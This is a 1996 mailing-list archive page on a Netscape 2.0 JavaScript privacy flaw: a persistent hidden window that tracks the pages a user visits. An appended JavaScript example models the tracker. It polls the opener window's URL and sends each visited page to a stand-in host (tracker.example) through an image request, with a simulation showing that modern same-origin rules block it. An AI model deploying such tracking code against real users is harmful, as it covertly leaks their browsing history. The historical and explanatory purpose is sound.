Interesting People mailing list archives

IP: Java security ????


From: Dave Farber <farber () central cis upenn edu>
Date: Fri, 23 Feb 1996 11:44:36 -0500

From: ethan miller <elm () cs umbc edu>

Apparently, someone has already figured out how to use the (supposed)
secure Java language to do spying.  This is important because it
doesn't rely on *any* bugs in Java; it merely takes advantage of a
design flaw (a Java script doesn't automatically get turned off when
you go to another page).


------- Forwarded Message


Date:    Thu, 22 Feb 1996 16:08:35 -0800
From:    Tom Phelps <phelps () CS Berkeley EDU>
To:      net.cool () ginsberg CS Berkeley EDU
Subject: JavaScript in Netscape 2.0 shouldn't let me do this, but it does


JavaScript in Netscape 2.0 shouldn't let me do this, but it does


John Robert LoVerso, OSF Research Institute 


After you've visited one of my pages, any of my JavaScript ought to
get scrubbed out of your browser's memory. You wouldn't want that code
to live on, snooping, spying, or stealing?


This is a simple example where I engage some JavaScript that runs in a
(mostly) hidden window.  This window persists, and hence, the
JavaScript I wrote persists. From then on, it wakes up every second
and sees what page you are viewing. If you've changed pages, it
reports where you now are back to me via a CGI, which saves
information like this:


(The rest at http://www.osf.org/~loverso/javascript/track-me.html)


AND


From: dmd () gradient cis upenn edu (Douglas DeCarlo)

In case you aren't aware of this yet, have you seen these privacy
problems which are in JavaScript in Netscape 2.0 (even after people
raised concerns in the beta versions)?


Such as a mailto upon loading a page (the page owners get mail from you
when you visit this page):
  http://www.popco.com/grabtest.html


Or even more intrusive, a script that reports what other pages you
visit (well, it does require another window, but the author claims it
can be hidden well):
  http://www.osf.org/~loverso/javascript/track-me.html


So much for private browsing..  :)


- Doug
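
The tracker that both forwarded notes point at, as an added example for
this archive page (it is not LoVerso's track-me.html code, which is only
linked above). It models what the text describes: a small window that
outlives the page that opened it, wakes once a second, reads the URL of
the window that opened it, and reports each change to a CGI. The polling
logic is kept free of browser globals so it can be run and checked under
Node; the browser glue at the end only executes when a `window` exists.
REPORT_CGI and the page URLs in the simulated session are made up for
this example.

```javascript
// Added example for this archive page; it is not LoVerso's track-me.html code.
// It models the tracker the forwarded text describes: a small window that
// persists after the user leaves the page, wakes once a second, reads the URL
// of the window that opened it, and reports each change to a CGI.
// The polling logic avoids browser globals so it can be run and checked under
// Node; the browser glue at the bottom only runs when a `window` exists.
// REPORT_CGI and the page URLs in the simulation are made up for this example.

const REPORT_CGI = "http://tracker.example/cgi-bin/track"; // assumed endpoint

// One GET per observed page change, with the observed URL as a query parameter.
function buildReportUrl(cgiBase, observedUrl) {
  return cgiBase + "?u=" + encodeURIComponent(observedUrl);
}

// Returns the tick() function a one-second timer calls. `openerRef` stands in
// for window.opener; `report` receives the report URL for each new page.
// tick() returns a status object so the behaviour can be asserted offline.
function makeTracker(openerRef, report) {
  let lastSeen = null;
  return function tick() {
    if (openerRef.closed) return { status: "gone" };
    let current;
    try {
      // Netscape 2.0 allowed this read from any origin; that is the design
      // flaw the post relies on. A current browser throws a SecurityError
      // once the opener has navigated to another origin.
      current = openerRef.location.href;
    } catch (err) {
      return { status: "blocked", reason: err.name };
    }
    if (lastSeen === null) {           // first wake-up: remember our own page
      lastSeen = current;
      return { status: "baseline", url: current };
    }
    if (current === lastSeen) return { status: "unchanged", url: current };
    lastSeen = current;                // page changed: phone home
    report(buildReportUrl(REPORT_CGI, current));
    return { status: "reported", url: current };
  };
}

// Stand-in for the opener window. `enforceSameOrigin` models today's
// same-origin policy: reading location.href of a cross-origin window throws.
function makeFakeOpener(trackerOrigin, enforceSameOrigin) {
  let href = trackerOrigin + "/track-me.html";
  return {
    closed: false,
    navigate(url) { href = url; },     // the user follows a link elsewhere
    get location() {
      if (enforceSameOrigin && !href.startsWith(trackerOrigin + "/")) {
        const err = new Error("Blocked a frame from accessing a cross-origin frame.");
        err.name = "SecurityError";
        throw err;
      }
      return { href };
    },
  };
}

// Drive the tracker through a scripted browsing session and collect what the
// attacker's CGI would have received.
function simulateSession(enforceSameOrigin) {
  const trackerOrigin = "http://tracker.example";
  const opener = makeFakeOpener(trackerOrigin, enforceSameOrigin);
  const received = [];
  const tick = makeTracker(opener, (url) => received.push(url));
  const statuses = [];
  statuses.push(tick().status);                      // still on our page
  opener.navigate("http://bank.example/accounts");   // user leaves our site
  statuses.push(tick().status);
  statuses.push(tick().status);                      // no change this second
  opener.navigate("http://news.example/today?id=42");
  statuses.push(tick().status);
  return { received, statuses };
}

// Browser glue, the 1996 technique: the hidden window that loaded this script
// polls every second and exfiltrates with an image request.
if (typeof window !== "undefined" && window.opener) {
  const tick = makeTracker(window.opener, (url) => { new Image().src = url; });
  setInterval(tick, 1000);
}
```

simulateSession(false) reproduces the 1996 behaviour: every page the user
moves to after leaving the tracker's site is reported. simulateSession(true)
shows why the same script is inert in a current browser: reading
location.href of a window that has navigated to another origin throws a
SecurityError, so the tracker is "blocked" from the first foreign page
onward. A site that also sends Cross-Origin-Opener-Policy: same-origin has
the opener reference severed entirely when it is loaded, so not even the
"gone"/"blocked" distinction is observable.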

